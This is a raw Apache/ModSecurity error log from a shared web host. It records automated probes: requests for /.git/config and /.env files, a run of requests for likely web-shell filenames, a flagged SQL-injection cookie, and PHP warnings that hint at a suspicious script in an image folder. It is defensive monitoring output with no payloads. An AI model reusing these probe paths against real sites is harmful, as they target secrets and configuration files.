[Mon May 11 18:20:29.909766 2026] [security2:error] [pid 1411201:tid 1411265] [client 34.30.123.40:60121] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: e401f1d573af1f9694a99550b0267ca3||1778518229||1778517869"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/xmlrpc.php"] [unique_id "agIBzfy_GXSWIKeli0scJgAAAJQ"]
[Mon May 11 18:20:29.909986 2026] [security2:error] [pid 1411201:tid 1411265] [client 34.30.123.40:60121] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/xmlrpc.php"] [unique_id "agIBzfy_GXSWIKeli0scJgAAAJQ"]
[Mon May 11 18:20:29.910536 2026] [security2:error] [pid 1411201:tid 1411265] [client 34.30.123.40:60121] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/xmlrpc.php"] [unique_id "agIBzfy_GXSWIKeli0scJgAAAJQ"]
[Mon May 11 18:21:03.676729 2026] [security2:error] [pid 1411055:tid 1411064] [client 43.153.215.249:52194] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.classist.fr"] [uri "/"] [unique_id "agIB70WKUxpmnkK7zHyoTgAAAQc"]
[Mon May 11 18:21:21.737075 2026] [:error] [pid 1424905:tid 1424918] [client 176.123.8.39:52731] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://t.co/
[Mon May 11 18:21:22.838625 2026] [:error] [pid 1424905:tid 1424918] [client 176.123.8.39:52731] File does not exist: /home/piregwan/public_html/wp-login.php
[Mon May 11 18:22:36.643462 2026] [authz_core:error] [pid 1411099:tid 1411121] [client 47.128.58.73:56034] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/theme-compat/error_log
[Mon May 11 18:22:54.690519 2026] [autoindex:error] [pid 1411099:tid 1411105] [client 172.234.217.129:3574] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 18:23:13.927088 2026] [security2:error] [pid 1411099:tid 1411110] [client 43.157.181.189:42894] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agICcQ-Qm4vhlWBPlMjjUAAAAAo"]
[Mon May 11 18:23:19.480755 2026] [security2:error] [pid 1424905:tid 1424928] [client 34.88.239.87:48792] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.git/config"] [unique_id "agICd4W8yzYoWG_eyCW_cwAAAVQ"]
[Mon May 11 18:23:19.480997 2026] [security2:error] [pid 1424905:tid 1424928] [client 34.88.239.87:48792] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.git/config"] [unique_id "agICd4W8yzYoWG_eyCW_cwAAAVQ"]
[Mon May 11 18:23:19.677000 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/file.php
[Mon May 11 18:23:19.835511 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/gettest.php
[Mon May 11 18:23:19.993673 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/gg.php
[Mon May 11 18:23:20.178717 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/goods.php
[Mon May 11 18:23:20.340489 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/maintenance.php
[Mon May 11 18:23:20.500484 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/info.php
[Mon May 11 18:23:20.670672 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/users.php
[Mon May 11 18:23:20.733673 2026] [security2:error] [pid 1424905:tid 1424928] [client 34.88.239.87:48792] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agICd4W8yzYoWG_eyCW_cwAAAVQ"]
[Mon May 11 18:23:20.829304 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/install.php
[Mon May 11 18:23:20.989178 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/item.php
[Mon May 11 18:23:21.176319 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/jga.php
[Mon May 11 18:23:21.337063 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/leaf.php
[Mon May 11 18:23:21.501094 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/ms-files.php
[Mon May 11 18:23:21.660733 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/lock.php
[Mon May 11 18:23:21.818761 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/wp-blog-header.php
[Mon May 11 18:23:21.976723 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/lock360.php
[Mon May 11 18:23:22.140753 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/log.php
[Mon May 11 18:23:22.328919 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/manager.php
[Mon May 11 18:23:22.487171 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/meta.php
[Mon May 11 18:23:22.645770 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/mini.php
[Mon May 11 18:23:22.806092 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/mjq.php
[Mon May 11 18:23:22.965343 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/new.php
[Mon May 11 18:23:23.126097 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/onclickfuns.php
[Mon May 11 18:23:23.284275 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/option.php
[Mon May 11 18:23:23.445002 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/plugin-editor.php
[Mon May 11 18:23:23.605862 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/profile.php
[Mon May 11 18:23:23.765598 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/qw_03b4ad31.php
[Mon May 11 18:23:23.924453 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/radio.php
[Mon May 11 18:23:24.085978 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/sf.php
[Mon May 11 18:23:24.244067 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/simple.php
[Mon May 11 18:23:24.408601 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/sql.php
[Mon May 11 18:23:24.569574 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/test.php
[Mon May 11 18:23:24.734976 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/test1.php
[Mon May 11 18:23:24.892990 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/themes.php
[Mon May 11 18:23:25.217232 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/wp-admin.php
[Mon May 11 18:23:25.554031 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/wp-blog-header.php
[Mon May 11 18:23:25.718218 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/wp-config-sample.php
[Mon May 11 18:23:26.533978 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/wp.php
[Mon May 11 18:23:26.586702 2026] [:error] [pid 1424905:tid 1424921] [client 51.38.112.81:56478] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:23:26.690691 2026] [:error] [pid 1411055:tid 1411073] [client 51.75.23.111:53904] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:23:26.803900 2026] [:error] [pid 1411099:tid 1411116] [client 149.202.53.222:60172] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:23:26.838211 2026] [:error] [pid 1411201:tid 1411268] [client 51.75.21.177:60340] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 18:23:26.860607 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:16662] File does not exist: /home/ixinabou/public_html/xmlrpc.php
[Mon May 11 18:23:32.472457 2026] [security2:error] [pid 1424905:tid 1424908] [client 85.11.167.19:41972] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agIChIW8yzYoWG_eyCW_hgAAAUA"]
[Mon May 11 18:23:32.472665 2026] [security2:error] [pid 1424905:tid 1424908] [client 85.11.167.19:41972] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agIChIW8yzYoWG_eyCW_hgAAAUA"]
[Mon May 11 18:23:32.476258 2026] [security2:error] [pid 1424905:tid 1424908] [client 85.11.167.19:41972] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agIChIW8yzYoWG_eyCW_hgAAAUA"]
[Mon May 11 18:24:05.920772 2026] [security2:error] [pid 1411099:tid 1411110] [client 43.156.156.96:56686] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "217.113.192.26"] [uri "/"] [unique_id "agICpQ-Qm4vhlWBPlMjjhgAAAAo"]
[Mon May 11 18:24:09.820794 2026] [:error] [pid 1411099:tid 1411122] [client 194.187.171.164:40331] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:24:11.959024 2026] [authz_core:error] [pid 1416109:tid 1416143] [client 194.163.174.253:62024] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/ID3/error_log, referer: binance.com
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/72/e56babef1abc4aa9d3320bdb80e6bc010dc131 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/72/e56babef1abc4aa9d3320bdb80e6bc010dc131 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 18:24:20.562900 2026] [authz_core:error] [pid 1411099:tid 1411115] [client 194.163.174.253:64541] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/ID3/error_log, referer: binance.com
[Mon May 11 18:24:31.851670 2026] [authz_core:error] [pid 1411055:tid 1411065] [client 194.163.174.253:51628] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 18:24:34.888630 2026] [security2:error] [pid 1416109:tid 1416134] [client 123.207.65.62:34832] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agICwlV4kyjgo4bQBUh-LQAAAMQ"]
[Mon May 11 18:24:38.298272 2026] [security2:error] [pid 1411201:tid 1411256] [client 123.207.65.62:43490] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agICxvy_GXSWIKeli0sdigAAAIo"], referer: http://letamsgarage.fr
[Mon May 11 18:24:39.999892 2026] [authz_core:error] [pid 1411099:tid 1411102] [client 194.163.174.253:54231] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 18:25:03.826217 2026] [proxy_fcgi:error] [pid 1424905:tid 1424913] [client 90.170.59.91:57651] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:25:05.210117 2026] [security2:error] [pid 1411055:tid 1411075] [client 43.166.132.142:59090] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/"] [unique_id "agIC4UWKUxpmnkK7zHypswAAARI"]
[Mon May 11 18:26:16.134814 2026] [security2:error] [pid 1411201:tid 1411249] [client 34.154.227.165:53526] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.dev"] [unique_id "agIDKPy_GXSWIKeli0sd-wAAAIM"]
[Mon May 11 18:26:16.134994 2026] [security2:error] [pid 1411201:tid 1411249] [client 34.154.227.165:53526] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.dev"] [unique_id "agIDKPy_GXSWIKeli0sd-wAAAIM"]
[Mon May 11 18:26:16.140296 2026] [core:error] [pid 1411201:tid 1411249] [client 34.154.227.165:53526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:16.144117 2026] [security2:error] [pid 1411201:tid 1411249] [client 34.154.227.165:53526] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKPy_GXSWIKeli0sd-wAAAIM"]
[Mon May 11 18:26:16.690770 2026] [security2:error] [pid 1411055:tid 1411077] [client 34.154.227.165:53540] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agIDKEWKUxpmnkK7zHyqAQAAARQ"]
[Mon May 11 18:26:16.691002 2026] [security2:error] [pid 1411055:tid 1411077] [client 34.154.227.165:53540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agIDKEWKUxpmnkK7zHyqAQAAARQ"]
[Mon May 11 18:26:16.703295 2026] [core:error] [pid 1411055:tid 1411077] [client 34.154.227.165:53540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:16.703477 2026] [security2:error] [pid 1411055:tid 1411077] [client 34.154.227.165:53540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKEWKUxpmnkK7zHyqAQAAARQ"]
[Mon May 11 18:26:17.099006 2026] [security2:error] [pid 1411055:tid 1411079] [client 34.154.227.165:53572] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/app/.env.local"] [unique_id "agIDKUWKUxpmnkK7zHyqAwAAARY"]
[Mon May 11 18:26:17.099214 2026] [security2:error] [pid 1411055:tid 1411079] [client 34.154.227.165:53572] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/app/.env.local"] [unique_id "agIDKUWKUxpmnkK7zHyqAwAAARY"]
[Mon May 11 18:26:17.099736 2026] [core:error] [pid 1411055:tid 1411079] [client 34.154.227.165:53572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:26:17.100120 2026] [security2:error] [pid 1411055:tid 1411079] [client 34.154.227.165:53572] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agIDKUWKUxpmnkK7zHyqAwAAARY"]
[Mon May 11 18:26:17.103691 2026] [security2:error] [pid 1416109:tid 1416149] [client 34.154.227.165:53558] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.docker"] [unique_id "agIDKVV4kyjgo4bQBUh-ogAAANM"]
